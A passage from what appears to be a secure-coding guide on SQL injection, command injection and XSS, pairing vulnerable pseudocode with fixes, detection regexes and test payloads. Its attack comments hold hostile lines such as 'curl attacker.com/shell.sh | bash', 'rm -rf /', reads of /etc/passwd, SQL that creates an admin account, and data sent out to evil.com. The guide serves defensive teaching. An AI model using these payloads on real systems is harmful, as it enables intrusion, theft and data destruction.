multiStatement = true) + +// Attack: newEmail = "x'; INSERT INTO users (email, role) VALUES ('attacker@evil.com', 'admin'); --" +// Result: Creates new admin account + +// Attack: newEmail = "x'; UPDATE users SET password = 'hacked' WHERE role = 'admin'; --" +// Result: Mass password reset for all admins +``` + +**Why This Is Dangerous:** +- Some database drivers allow multiple statements by default +- Single injection point enables unlimited query execution +- Can create backdoor accounts, modify permissions, exfiltrate data +- Often missed because original query "succeeds" + +--- + +## Command Injection: Multiple BAD Examples + +### BAD Example 1: Shell Command Construction + +```pseudocode +// VULNERABLE: Direct command construction +function pingHost(hostname): + command = "ping -c 4 " + hostname + return shell.execute(command) + +// Attack: hostname = "127.0.0.1; cat /etc/passwd" +// Result: ping -c 4 127.0.0.1; cat /etc/passwd +// Executes both commands + +// VULNERABLE: Using shell=True with format strings +function checkDiskUsage(directory): + command = f"du -sh {directory}" + return subprocess.run(command, shell=True) + +// Attack: directory = "/tmp; rm -rf /" +// Result: Destructive command execution +``` + +**Why This Is Dangerous:** +- Shell metacharacters (`;`, `|`, `&`, `$()`, backticks) enable command chaining +- Attacker gains shell access on the server +- Can read sensitive files, install malware, pivot to other systems +- Shell=True interprets all special characters + +--- + +### BAD Example 2: Path Manipulation in Commands + +```pseudocode +// VULNERABLE: File path from user input +function convertImage(inputFile, outputFile): + command = f"convert {inputFile} -resize 800x600 {outputFile}" + return shell.execute(command) + +// Attack: inputFile = "image.jpg; curl attacker.com/shell.sh | bash" +// Result: Downloads and executes malware + +// Attack: inputFile = "$(cat /etc/passwd > /tmp/out.txt)image.jpg" +// Result: File exfiltration via command substitution + +// VULNERABLE: Filename in archiving +function createBackup(filename): + command = f"tar -czf backup.tar.gz {filename}" + return shell.execute(command) + +// Attack: filename = "--checkpoint=1 --checkpoint-action=exec=sh\ shell.sh" +// Result: tar option injection (GTFOBins-style attack) +``` + +**Why This Is Dangerous:** +- Paths often contain attacker-controlled portions (uploaded filenames) +- Command-line tools have dangerous flag behaviors (GTFOBins) +- Argument injection even without shell metacharacters +- `$(...)` and backticks execute subcommands + +--- + +### BAD Example 3: Argument Injection + +```pseudocode +// VULNERABLE: Arguments from user input +function fetchUrl(url): + command = f"curl {url}" + return shell.execute(command) + +// Attack: url = "-o /var/www/html/shell.php http://evil.com/shell.php" +// Result: Writes file to webserver (web shell) + +// Attack: url = "--config /etc/passwd" +// Result: Error message reveals file contents + +// VULNERABLE: Git commands with user input +function cloneRepository(repoUrl): + command = f"git clone {repoUrl}" + return shell.execute(command) + +// Attack: repoUrl = "--upload-pack='touch /tmp/pwned' git://evil.com/repo" +// Result: Arbitrary command execution via git options +``` + +**Why This Is Dangerous:** +- Programs interpret flags anywhere in argument list +- Can override intended behavior via injected flags +- `--` doesn't always prevent injection (depends on program) +- Many tools have "write file" or "execute" options + +--- + +### BAD Example 4: Environment Variable Injection + +```pseudocode +// VULNERABLE: User-controlled environment variable +function runWithCustomPath(command, customPath): + environment = {"PATH": customPath} + return subprocess.run(command, env=environment, shell=True) + +// Attack: customPath = "/tmp/evil:$PATH" +// If /tmp/evil contains malicious 'ls' binary, it executes instead + +// VULNERABLE: Library path manipulation +function loadPlugin(pluginPath): + environment = {"LD_PRELOAD": pluginPath} + return subprocess.run("target-app", env=environment) + +// Attack: pluginPath = "/tmp/evil.so" +// Result: Malicious shared library loaded, code execution +``` + +**Why This Is Dangerous:** +- Environment variables affect program behavior in unexpected ways +- PATH hijacking allows executing attacker binaries +- LD_PRELOAD/DYLD_INSERT_LIBRARIES enable library injection +- Some programs read secrets from environment (unintended exposure) + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Parameterized Queries (All Major DB Patterns) + +```pseudocode +// SECURE: Parameterized query - positional parameters +function getUserById(userId): + query = "SELECT * FROM users WHERE id = ?" + return database.execute(query, [userId]) + +// SECURE: Named parameters +function getUserByEmailAndStatus(email, status): + query = "SELECT * FROM users WHERE email = :email AND status = :status" + return database.execute(query, {email: email, status: status}) + +// SECURE: Multiple value insertion +function createUser(name, email, role): + query = "INSERT INTO users (name, email, role) VALUES (?, ?, ?)" + return database.execute(query, [name, email, role]) + +// SECURE: IN clause with dynamic count +function getUsersByIds(userIds): + placeholders = ", ".join(["?" for _ in userIds]) + query = f"SELECT * FROM users WHERE id IN ({placeholders})" + return database.execute(query, userIds) + +// SECURE: Transaction with multiple parameterized queries +function transferFunds(fromId, toId, amount): + database.beginTransaction() + try: + database.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?", [amount, fromId]) + database.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", [amount, toId]) + database.commit() + catch error: + database.rollback() + throw error +``` + +**Why This Is Secure:** +- Database driver separates query structure from data +- Parameters are never interpreted as SQL +- Works with all standard data types +- Prevents all SQL injection variants in value positions + +--- + +### GOOD Example 2: ORM Safe Usage + +```pseudocode +// SECURE: ORM with typed queries +function getUserById(userId): + return User.findOne({where: {id: userId}}) + +// SECURE: ORM with relationships +function getUserWithOrders(userId): + return User.findOne({ + where: {id: userId}, + include: [{model: Order, as: 'orders'}] + }) + +// SECURE: ORM query builder +function searchProducts(filters): + query = Product.query() + + if filters.category: + query = query.where('category', '=', filters.category) + if filters.minPrice: + query = query.where('price', '>=', filters.minPrice) + if filters.maxPrice: + query = query.where('price', '<=', filters.maxPrice) + + return query.get() + +// WARNING: ORM raw query - still needs parameterization! +function customQuery(userId): + // STILL VULNERABLE if using string interpolation: + // return database.raw(f"SELECT * FROM users WHERE id = {userId}") + + // SECURE: Use ORM's parameterization + return database.raw("SELECT * FROM users WHERE id = ?", [userId]) +``` + +**Why This Is Secure:** +- ORM handles parameterization automatically +- Type checking prevents some injection attempts +- Query builders construct safe queries programmatically +- Still requires care with raw queries + +--- + +### GOOD Example 3: Safe Dynamic Table/Column Names (Allowlist) + +```pseudocode +// SECURE: Allowlist for table names +ALLOWED_TABLES = {"users", "products", "orders", "categories"} + +function getDataFromTable(tableName, id): + if tableName not in ALLOWED_TABLES: + throw ValidationError("Invalid table name") + + // Safe because tableName is from allowlist, not user input + query = f"SELECT * FROM {tableName} WHERE id = ?" + return database.execute(query, [id]) + +// SECURE: Allowlist for sort columns +SORT_COLUMNS = { + "name": "name", + "price": "price", + "date": "created_at", + "popularity": "view_count" +} + +function getProducts(sortBy, sortOrder): + column = SORT_COLUMNS.get(sortBy, "name") // Default to 'name' + direction = "DESC" if sortOrder == "desc" else "ASC" + + query = f"SELECT * FROM products ORDER BY {column} {direction}" + return database.execute(query) + +// SECURE: Quoted identifiers as additional defense +function getDataDynamic(tableName, columnName, value): + if tableName not in ALLOWED_TABLES: + throw ValidationError("Invalid table") + if columnName not in ALLOWED_COLUMNS[tableName]: + throw ValidationError("Invalid column") + + // Use database quoting function for identifiers + quotedTable = database.quoteIdentifier(tableName) + quotedColumn = database.quoteIdentifier(columnName) + + query = f"SELECT * FROM {quotedTable} WHERE {quotedColumn} = ?" + return database.execute(query, [value]) +``` + +**Why This Is Secure:** +- Allowlist ensures only known-safe values used +- User input maps to predefined safe values +- Identifier quoting provides defense-in-depth +- Validation happens before query construction + +--- + +### GOOD Example 4: Safe Command Execution + +```pseudocode +// SECURE: Argument array (no shell interpretation) +function pingHost(hostname): + // Validate hostname format first + if not isValidHostname(hostname): + throw ValidationError("Invalid hostname format") + + // Use argument array - shell metacharacters are literal + result = subprocess.run( + ["ping", "-c", "4", hostname], + shell = false, // CRITICAL: no shell interpretation + capture_output = true, + timeout = 30 + ) + return result.stdout + +// SECURE: Allowlist for command arguments +ALLOWED_FORMATS = {"png", "jpg", "gif", "webp"} + +function convertImage(inputPath, outputPath, format): + // Validate format from allowlist + if format not in ALLOWED_FORMATS: + throw ValidationError("Invalid format") + + // Validate paths are within allowed directory + if not isPathWithinDirectory(inputPath, UPLOAD_DIR): + throw ValidationError("Invalid input path") + if not isPathWithinDirectory(outputPath, OUTPUT_DIR): + throw ValidationError("Invalid output path") + + // Safe argument array + result = subprocess.run( + ["convert", inputPath, "-resize", "800x600", f"{outputPath}.{format}"], + shell = false + ) + return result + +// SECURE: Using libraries instead of shell commands +function checkDiskUsage(directory): + // Use language-native library instead of shell + return filesystem.getDirectorySize(directory) + +function readJsonFile(filepath): + // Don't use: shell.execute(f"cat {filepath} | jq .") + // Use language JSON library + return json.parse(filesystem.readFile(filepath)) +``` + +**Why This Is Secure:** +- Argument arrays pass arguments directly to program +- No shell interpretation of metacharacters +- Allowlists prevent unexpected values +- Path validation prevents directory traversal +- Native libraries avoid shell entirely + +--- + +## Edge Cases Section + +### Edge Case 1: Second-Order Injection (Stored Then Executed) + +```pseudocode +// DANGEROUS: Data stored safely but used unsafely later + +// Step 1: User creates profile (looks safe) +function createProfile(userId, displayName): + // Parameterized - SAFE for initial storage + query = "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)" + database.execute(query, [userId, displayName]) + // Attacker sets displayName = "admin'--" + +// Step 2: Background job uses stored data UNSAFELY +function generateReportForUser(userId): + // Get the stored display name + profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId]) + displayName = profile.display_name + // "admin'--" retrieved from database + + // VULNERABLE: Trusting data from database + reportQuery = f"INSERT INTO reports (title) VALUES ('Report for {displayName}')" + database.execute(reportQuery) + // Result: INSERT INTO reports (title) VALUES ('Report for admin'--') + +// SECURE: Parameterize ALL queries, even with "internal" data +function generateReportForUserSafe(userId): + profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId]) + + // Still parameterize even though data is from database + reportQuery = "INSERT INTO reports (title) VALUES (?)" + database.execute(reportQuery, [f"Report for {profile.display_name}"]) +``` + +**Detection:** Audit all code paths where database data is used in subsequent queries. + +--- + +### Edge Case 2: Injection in Stored Procedures + +```pseudocode +// DANGEROUS: Dynamic SQL inside stored procedure + +// Stored Procedure Definition (in database) +CREATE PROCEDURE searchUsers(searchTerm VARCHAR(100)) +BEGIN + // VULNERABLE: Dynamic SQL construction + SET @query = CONCAT('SELECT * FROM users WHERE name LIKE ''%', searchTerm, '%'''); + PREPARE stmt FROM @query; + EXECUTE stmt; +END + +// Application code looks safe... +function searchUsers(term): + return database.callProcedure("searchUsers", [term]) + // But injection still occurs inside the procedure! + +// SECURE: Parameterized even in stored procedures +CREATE PROCEDURE searchUsersSafe(searchTerm VARCHAR(100)) +BEGIN + // Use parameterization within procedure + SELECT * FROM users WHERE name LIKE CONCAT('%', searchTerm, '%'); + // Or use prepared statement properly + SET @query = 'SELECT * FROM users WHERE name LIKE ?'; + SET @search = CONCAT('%', searchTerm, '%'); + PREPARE stmt FROM @query; + EXECUTE stmt USING @search; +END +``` + +**Detection:** Review all stored procedures for dynamic SQL construction. + +--- + +### Edge Case 3: Injection Through Encoding Bypass + +```pseudocode +// DANGEROUS: Encoding-based bypass attempts + +// Scenario 1: Double-encoding bypass +function searchWithFilter(term): + // Application URL-decodes once + decoded = urlDecode(term) // %2527 -> %27 + + // WAF sees %27, not single quote + // Second decode happens: %27 -> ' + + query = f"SELECT * FROM items WHERE name = '{decoded}'" + // Injection succeeds + +// Scenario 2: Unicode normalization bypass +function filterUsername(username): + // Check for dangerous characters + if "'" in username or "\"" in username: + throw ValidationError("Invalid characters") + + // VULNERABLE: Unicode normalization happens AFTER validation + normalized = unicodeNormalize(username) + // 'ʼ' (U+02BC) might normalize to "'" (U+0027) in some systems + + query = f"SELECT * FROM users WHERE username = '{normalized}'" + +// SECURE: Parameterization makes encoding irrelevant +function searchSafe(term): + // Encoding doesn't matter - it's just data + query = "SELECT * FROM items WHERE name = ?" + return database.execute(query, [term]) + +// SECURE: Validate AFTER all normalization +function filterUsernameSafe(username): + // Normalize first + normalized = unicodeNormalize(username) + + // Then validate + if not isValidUsernameChars(normalized): + throw ValidationError("Invalid characters") + + // Then use (still with parameterization) + query = "SELECT * FROM users WHERE username = ?" + return database.execute(query, [normalized]) +``` + +**Detection:** Test with various encoded payloads (`%27`, `%2527`, Unicode variants). + +--- + +## Common Mistakes Section + +### Mistake 1: Thinking Escaping Is Enough + +```pseudocode +// DANGEROUS: Manual escaping is error-prone + +function getUserByNameEscaped(name): + // "Escaping" by replacing quotes + escapedName = name.replace("'", "''") + query = f"SELECT * FROM users WHERE name = '{escapedName}'" + return database.execute(query) + +// Problems with this approach: +// 1. Different databases have different escape rules +// 2. Multibyte character encoding bypasses (GBK, etc.) +// 3. Doesn't handle all injection vectors +// 4. Easy to forget in one place +// 5. Backslash escaping varies by database + +// Attack (MySQL with NO_BACKSLASH_ESCAPES off): +// name = "\' OR 1=1 --" +// Result: \'' OR 1=1 -- (backslash escapes first quote) + +// Attack (multibyte): name = 0xbf27 +// In GBK: 0xbf5c27 -> valid multibyte char + literal quote + +// ALWAYS USE PARAMETERIZATION - it's not about escaping +function getUserByNameSafe(name): + query = "SELECT * FROM users WHERE name = ?" + return database.execute(query, [name]) +``` + +**Key Insight:** Parameterization doesn't "escape" - it sends query structure and data separately. + +--- + +### Mistake 2: Trusting "Internal" Data Sources + +```pseudocode +// DANGEROUS: Trusting data because it's "internal" + +function processMessage(messageFromQueue): + // "This is from our internal queue, so it's safe" + userId = messageFromQueue.userId + + query = f"SELECT * FROM users WHERE id = {userId}" + return database.execute(query) + +// BUT: Where did that queue message originate? +// - User input that was serialized to queue +// - External API response stored in queue +// - Another service that has its own vulnerabilities + +// DANGEROUS: Trusting data from other tables/services +function getOrderDetails(orderId): + order = database.execute("SELECT * FROM orders WHERE id = ?", [orderId]) + + // Order.notes was user-supplied + query = f"SELECT * FROM notes WHERE content LIKE '%{order.notes}%'" + // Still vulnerable to second-order injection + +// SECURE: Parameterize ALL queries regardless of data source +function processMessageSafe(messageFromQueue): + query = "SELECT * FROM users WHERE id = ?" + return database.execute(query, [messageFromQueue.userId]) +``` + +**Rule:** Never trust ANY data in query construction - always parameterize. + +--- + +### Mistake 3: Partial Parameterization + +```pseudocode +// DANGEROUS: Parameterizing some parts but not others + +function searchUsers(name, sortColumn, limit): + // Parameterized the value, but not ORDER BY or LIMIT + query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortColumn} LIMIT {limit}" + return database.execute(query, [name]) + +// Attack: sortColumn = "1; DELETE FROM users; --" +// Attack: limit = "1 UNION SELECT password FROM admin_users" + +// DANGEROUS: Parameterized WHERE but not table +function getDataFlexible(tableName, filterColumn, filterValue): + query = f"SELECT * FROM {tableName} WHERE {filterColumn} = ?" + return database.execute(query, [filterValue]) + // Table name and column still injectable + +// SECURE: Validate/allowlist everything that can't be parameterized +function searchUsersSafe(name, sortColumn, limit): + // Allowlist for sort column + allowedSorts = {"name", "email", "created_at"} + sortCol = sortColumn if sortColumn in allowedSorts else "name" + + // Validate limit is positive integer + limitNum = min(max(int(limit), 1), 100) // Clamp to 1-100 + + query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortCol} LIMIT {limitNum}" + return database.execute(query, [name]) +``` + +**Key Insight:** Every injectable position needs either parameterization or allowlist validation. + +--- + +## Detection Hints and Testing Approaches + +### Automated Detection Patterns + +```pseudocode +// Regex patterns to find SQL injection vulnerabilities: + +// 1. String concatenation with SQL keywords +regex: /(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|ORDER BY).*(\+|\.concat|\$\{|f['"])/i + +// 2. Format strings with SQL +regex: /f["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*\{.*\}/i + +// 3. String interpolation in queries +regex: /execute\s*\(\s*["`'].*\$\{?[a-zA-Z_]/ + +// Command injection patterns: + +// 4. Shell execution with concatenation +regex: /(system|exec|shell_exec|popen|subprocess\.run|os\.system)\s*\(.*(\+|\$\{|f['"])/ + +// 5. Shell=True with variables +regex: /shell\s*=\s*[Tt]rue.*\{|shell\s*=\s*[Tt]rue.*\+/ +``` + +### Manual Testing Approaches + +```pseudocode +// SQL Injection Test Payloads: + +basicTests = [ + "' OR '1'='1", // Basic auth bypass + "'; DROP TABLE test; --", // Stacked queries + "' UNION SELECT null--", // Union-based + "1 AND 1=1", // Boolean-based + "1' AND SLEEP(5)--", // Time-based blind +] + +// Command Injection Test Payloads: + +commandTests = [ + "; whoami", // Command chaining + "| id", // Pipe injection + "$(whoami)", // Command substitution + "`id`", // Backtick substitution + "& ping -c 4 attacker.com", // Background execution +] + +// Testing Methodology: +1. Identify all input points (forms, URLs, headers, JSON fields) +2. Trace input flow to database queries or shell commands +3. Inject test payloads at each point +4. Monitor for: + - SQL errors in response + - Time delays (for blind injection) + - DNS/HTTP callbacks (for out-of-band) + - Changed behavior indicating injection success +``` + +### Code Review Checklist + +| Check | What to Look For | +|-------|------------------| +| **Query Construction** | Any string concatenation or interpolation with query strings | +| **Dynamic Identifiers** | Table names, column names, ORDER BY from user input | +| **Raw Queries in ORM** | `.raw()`, `.execute()`, or similar with string building | +| **Shell Execution** | Any use of `system()`, `exec()`, `shell=True` | +| **Command Building** | String concatenation before command execution | +| **Input Sources** | Follow data from request to query/command | + +--- + +## Security Checklist + +- [ ] All SQL queries use parameterized statements or prepared queries +- [ ] ORM raw queries also use parameterization +- [ ] Dynamic table/column names validated against strict allowlist +- [ ] ORDER BY and LIMIT clauses use validated/allowlisted values +- [ ] No shell=True in subprocess calls +- [ ] All command-line arguments passed as arrays, not strings +- [ ] User-controlled file paths validated and sanitized +- [ ] Environment variables not set from user input +- [ ] Second-order injection considered (data from DB still parameterized) +- [ ] Stored procedures reviewed for internal dynamic SQL +- [ ] Input validation applied before any normalization/decoding +- [ ] Code review specifically checks all query/command construction + +--- + +# Pattern 3: Cross-Site Scripting (XSS) + +**CWE References:** CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-80 (Basic XSS), CWE-83 (Improper Neutralization in Attributes), CWE-87 (Improper Neutralization in URI) + +**Priority Score:** 23 (Frequency: 10, Severity: 8, Detectability: 5) + +--- + +## Introduction: Why AI Often Misses Context-Specific Encoding + +Cross-Site Scripting (XSS) is one of the most prevalent vulnerabilities in AI-generated code. Research shows that **86% of AI-generated code fails XSS defenses** (Veracode 2025), and AI-generated code is **2.74x more likely to contain XSS** than human-written code (CodeRabbit analysis). + +**Why AI Models Generate XSS Vulnerabilities:** + +1. **Context-Blindness:** XSS prevention requires understanding the *context* where user input will be rendered—HTML body, attributes, JavaScript, CSS, or URLs. Each context requires different encoding. AI models frequently apply generic or no encoding because they lack awareness of rendering context. + +2. **Training Data Shows innerHTML Everywhere:** Tutorials and Stack Overflow answers heavily use `innerHTML`, `document.write()`, and template string injection for DOM manipulation. AI learns these as standard patterns. + +3. **Framework Misunderstanding:** Modern frameworks like React provide automatic escaping, but AI often bypasses these safeguards using `dangerouslySetInnerHTML`, `v-html`, or raw template interpolation when the task seems to require "rich" HTML output. + +4. **Encoding vs. Validation Confusion:** AI models often implement input validation (checking what characters are allowed) but skip output encoding (safely rendering data in context). Validation is for data integrity; encoding is for XSS prevention. + +5. **Client-Side Trust:** AI frequently treats client-side code as "safe" since it runs in the browser. It fails to recognize that XSS attacks *exploit* the browser's trust in the application. + +**Impact of XSS:** + +- **Session Hijacking:** Attacker steals session cookies and impersonates victims +- **Account Takeover:** Keylogging, credential theft, or forced password changes +- **Data Exfiltration:** Stealing sensitive data displayed to the user +- **Malware Distribution:** Redirecting users to malicious sites +- **Defacement:** Altering page content for phishing or reputation damage +- **Worm Propagation:** Self-spreading XSS (Samy worm affected 1M MySpace users) + +**XSS Variants:** + +| Type | Storage | Execution | Example Vector | +|------|---------|-----------|----------------| +| **Reflected** | URL/Request | Immediate | Search query in results page | +| **Stored** | Database | Later visitors | Comment with script in blog | +| **DOM-based** | Client-side | JavaScript processes | URL fragment processed by JS | +| **Mutation (mXSS)** | Sanitizer bypass | DOM mutation | Markup that changes during parsing | + +--- + +## Multiple BAD Examples Across Contexts + +### BAD Example 1: HTML Body Injection + +```pseudocode +// VULNERABLE: Direct injection into HTML body +function displayUserComment(comment): + // User input directly placed in HTML + document.getElementById("comments").innerHTML = + "
" + comment + "
" + +// Attack: comment = "" +// Result: Script executes, cookies sent to attacker + +// VULNERABLE: Server-side template without encoding +function renderProfilePage(username, bio): + return """ + + +

Profile: {username}

+

{bio}

+ + + """.format(username=username, bio=bio) + +// Attack: bio = "" +// Result: onerror handler executes JavaScript + +// VULNERABLE: Using document.write +function showWelcome(name): + document.write("

Welcome, " + name + "!

") + +// Attack: name = "" +``` + +**Why This Is Dangerous:** +- Script tags execute immediately upon DOM insertion +- Event handlers (`onerror`, `onload`, `onclick`) execute without script tags +- SVG elements can contain executable code +- `document.write` and `innerHTML` interpret HTML in user input + +--- + +### BAD Example 2: HTML Attribute Injection + +```pseudocode +// VULNERABLE: User input in HTML attributes +function renderImage(imageUrl, altText): + return '' + altText + '' + +// Attack: altText = '" onmouseover="alert(document.cookie)" x="' +// Result: + +// VULNERABLE: Unquoted attributes +function renderLink(url, text): + return "" + text + "" + +// Attack: url = "http://site.com onclick=alert(1)" +// Result: text + +// VULNERABLE: Input in style attribute +function setBackgroundColor(color): + element.setAttribute("style", "background-color: " + color) + +// Attack: color = "red; background-image: url('javascript:alert(1)')" +// Attack: color = "expression(alert('XSS'))" // IE-specific + +// VULNERABLE: Event handler attribute +function renderButton(buttonId, label): + return '' + +// Attack: label = "'); alert(document.cookie); ('" +// Result: onclick="handleClick(''); alert(document.cookie); ('")" +``` + +**Why This Is Dangerous:** +- Unquoted attributes break at whitespace, allowing new attributes +- Quoted attributes can break out with matching quotes +- Event handler attributes execute JavaScript directly +- Certain attributes (`href`, `src`, `style`) have special parsing rules + +--- + +### BAD Example 3: JavaScript Context Injection + +```pseudocode +// VULNERABLE: User input embedded in JavaScript +function generateUserScript(username): + return """ + + """.format(username=username) + +// Attack: username = "'; alert(document.cookie); //'" +// Result: var currentUser = ''; alert(document.cookie); //'; + +// VULNERABLE: JSON data embedded in script +function embedUserData(userData): + return """ + + """.format(userData=jsonEncode(userData)) + +// Attack: userData contains +// JSON encoding doesn't prevent HTML context escape + +// VULNERABLE: Template literals with user input +function renderTemplate(message): + return `` + +// Attack: message = '${alert(document.cookie)}' // Template literal injection +// Attack: message = '");alert(document.cookie);//' // String escape + +// VULNERABLE: Dynamic script construction +function addEventHandler(eventName, userCallback): + element.setAttribute("onclick", "handleEvent('" + userCallback + "')") + +// Attack: userCallback = "'); stealData(); ('" +``` + +**Why This Is Dangerous:** +- JavaScript string context requires JavaScript-specific escaping +- HTML closing tags (``) can break out of script blocks +- Template literals have their own injection risks +- Inline event handlers compound HTML and JavaScript contexts + +--- + +### BAD Example 4: URL Context Injection + +```pseudocode +// VULNERABLE: User input in href attribute +function renderNavLink(destination): + return 'Click here' + +// Attack: destination = "javascript:alert(document.cookie)" +// Result: Click here + +// VULNERABLE: URL parameters without encoding +function buildSearchUrl(query): + return 'Search again' + +// Attack: query = '" onclick="alert(1)" x="' +// Result: Search again + +// VULNERABLE: Redirect based on user input +function handleRedirect(url): + window.location = url + +// Attack: url = "javascript:alert(document.cookie)" +// Result: JavaScript execution via location change + +// VULNERABLE: Open redirect leading to XSS +function redirectAfterLogin(returnUrl): + return '' + +// Attack: returnUrl = "data:text/html," +// Attack: returnUrl = "javascript:alert(1)" +``` + +**Why This Is Dangerous:** +- `javascript:` URLs execute code when navigated +- `data:` URLs can contain executable HTML/JavaScript +- `vbscript:` URLs execute on older IE +- URL encoding alone doesn't prevent protocol-based attacks + +--- + +### BAD Example 5: CSS Context Injection + +```pseudocode +// VULNERABLE: User input in CSS +function applyCustomStyle(customCss): + styleElement = document.createElement("style") + styleElement.textContent = ".user-style { " + customCss + " }" + document.head.appendChild(styleElement) + +// Attack: customCss = "} body { background: url('http://evil.com/log?data=' + document.cookie); } .x {" +// Result: CSS exfiltration of page data + +// VULNERABLE: CSS expression (legacy IE) +function setWidth(width): + element.style.cssText = "width: " + width + +// Attack: width = "expression(alert(document.cookie))" +// Result: JavaScript execution via CSS expression (IE) + +// VULNERABLE: CSS injection via style attribute +function renderAvatar(avatarUrl): + return '
' + +// Attack: avatarUrl = "x); } body { background: red; } .x { content: url(x" +// Modern Attack: avatarUrl = "https://evil.com/?' + btoa(document.body.innerHTML) + '" + +// VULNERABLE: CSS @import injection +function loadTheme(themeUrl): + return "" + +// Attack: themeUrl = "'); } * { background: url('http://evil.com/steal?" +``` + +**Why This Is Dangerous:** +- CSS can exfiltrate data via `url()` requests +- Legacy IE `expression()` executes JavaScript +- CSS injection can alter page appearance for phishing +- `@import` can load attacker-controlled stylesheets + +--- + +## GOOD Examples for Each Context + +### GOOD Example 1: Proper HTML Encoding + +```pseudocode +// SECURE: HTML entity encoding for body content +function htmlEncode(str): + return str + .replace("&", "&") // Must be first + .replace("<", "<") + .replace(">", ">") + .replace('"', """) + .replace("'", "'") + .replace("/", "/") // Prevents escapes + +function displayUserComment(comment): + safeComment = htmlEncode(comment) + document.getElementById("comments").innerHTML = + "
" + safeComment + "
" + +// SECURE: Using textContent instead of innerHTML +function displayUserCommentSafe(comment): + div = document.createElement("div") + div.className = "comment" + div.textContent = comment // Automatically safe - no HTML interpretation + document.getElementById("comments").appendChild(div) + +// SECURE: Server-side template with auto-escaping +function renderProfilePage(username, bio): + // Use templating engine with auto-escaping enabled + return template.render("profile.html", { + username: username, // Engine auto-escapes + bio: bio + }) + +// SECURE: Framework createElement pattern +function createUserCard(name, email): + card = document.createElement("article") + + nameEl = document.createElement("h3") + nameEl.textContent = name // Safe + + emailEl = document.createElement("p") + emailEl.textContent = email // Safe + + card.appendChild(nameEl) + card.appendChild(emailEl) + return card +``` + +**Why This Is Secure:** +- HTML entities are displayed as text, not interpreted as markup +- `textContent` never interprets HTML +- createElement + textContent is inherently safe +- Auto-escaping templates handle encoding automatically + +--- + +### GOOD Example 2: Proper Attribute Encoding + +```pseudocode +// SECURE: Attribute encoding (superset of HTML encoding) +function attributeEncode(str): + return str + .replace("&", "&") + .replace("<", "<") + .replace(">", ">") + .replace('"', """) + .replace("'", "'") + .replace("`", "`") + .replace("=", "=") + +// SECURE: Always quote attributes and encode values +function renderImage(imageUrl, altText): + safeUrl = attributeEncode(imageUrl) + safeAlt = attributeEncode(altText) + return '' + safeAlt + '' + +// SECURE: Using setAttribute (browser handles encoding) +function renderImageSafe(imageUrl, altText): + img = document.createElement("img") + img.setAttribute("src", imageUrl) // Safe + img.setAttribute("alt", altText) // Safe + return img + +// SECURE: Data attributes with proper encoding +function renderDataElement(userId, userName): + div = document.createElement("div") + div.dataset.userId = userId // Automatically safe + div.dataset.userName = userName // Automatically safe + return div + +// SECURE: Style attribute with validation +ALLOWED_COLORS = {"red", "blue", "green", "yellow", "#fff", "#000"} + +function setBackgroundColor(color): + if color in ALLOWED_COLORS: + element.style.backgroundColor = color + else: + element.style.backgroundColor = "white" // Safe default +``` + +**Why This Is Secure:** +- Quotes prevent attribute breakout +- Encoding prevents quote escapes +- setAttribute handles encoding automatically +- dataset properties are automatically safe +- Allowlists prevent injection of arbitrary values + +--- + +### GOOD Example 3: JavaScript Encoding + +```pseudocode +// SECURE: JavaScript string encoding +function jsStringEncode(str): + return str + .replace("\\", "\\\\") // Backslash first + .replace("'", "\\'") + .replace('"', '\\"') + .replace("\n", "\\n") + .replace("\r", "\\r") + .replace(" breakout + safeJson = htmlEncode(jsonData) + + return """ + + """.format(safeJson=safeJson) + +// BETTER: Use data attributes instead of inline scripts +function embedUserDataSafe(element, userData): + // Store data in attribute, process in external script + element.dataset.user = jsonEncode(userData) + // External script reads: JSON.parse(element.dataset.user) + +// SECURE: Separate data from code with JSON endpoint +function loadUserData(): + // Instead of embedding in HTML, fetch from API + fetch('/api/user/data') + .then(response => response.json()) + .then(data => processData(data)) + +// SECURE: Using structured data in script type +function embedStructuredData(pageData): + return """ + + + """.format(jsonData=jsonEncode(pageData)) +``` + +**Why This Is Secure:** +- JavaScript escaping prevents string breakout +- HTML encoding in script blocks prevents `` escape +- Data attributes separate data from code +- JSON endpoints avoid embedding untrusted data in HTML +- `type="application/json"` blocks aren't executed as JavaScript + +--- + +### GOOD Example 4: URL Encoding + +```pseudocode +// SECURE: URL encoding for query parameters +function urlEncode(str): + return encodeURIComponent(str) + +function buildSearchUrl(query): + safeQuery = urlEncode(query) + return '/search?q=' + safeQuery + +// SECURE: Validating URL schemes (allowlist) +SAFE_SCHEMES = {"http", "https", "mailto"} + +function validateUrl(url): + try: + parsed = parseUrl(url) + if parsed.scheme.lower() in SAFE_SCHEMES: + return url + catch: + pass + return "/fallback" // Safe default + +function renderLink(destination, text): + safeUrl = validateUrl(destination) + safeText = htmlEncode(text) + return '' + safeText + '' + +// SECURE: URL validation with additional checks +function validateExternalUrl(url): + parsed = parseUrl(url) + + // Check scheme + if parsed.scheme.lower() not in {"http", "https"}: + return null + + // Check for credential injection + if parsed.username or parsed.password: + return null + + // Check for IP address (optional restriction) + if isIpAddress(parsed.host): + return null + + return url + +// SECURE: Relative URLs only (prevent open redirect) +function validateRedirectUrl(url): + // Only allow relative paths + if url.startsWith("/") and not url.startsWith("//"): + // Prevent path traversal + normalized = normalizePath(url) + if not ".." in normalized: + return normalized + return "/" // Safe default +``` + +**Why This Is Secure:** +- `encodeURIComponent` handles special characters +- Scheme allowlist prevents `javascript:` and `data:` URLs +- Relative-only validation prevents open redirects +- Multiple validation layers provide defense in depth + +--- + +### GOOD Example 5: Using Safe APIs (textContent vs innerHTML) + +```pseudocode +// SECURE: Safe DOM manipulation patterns + +// Instead of innerHTML with user data: +// DANGEROUS: element.innerHTML = "

" + userInput + "

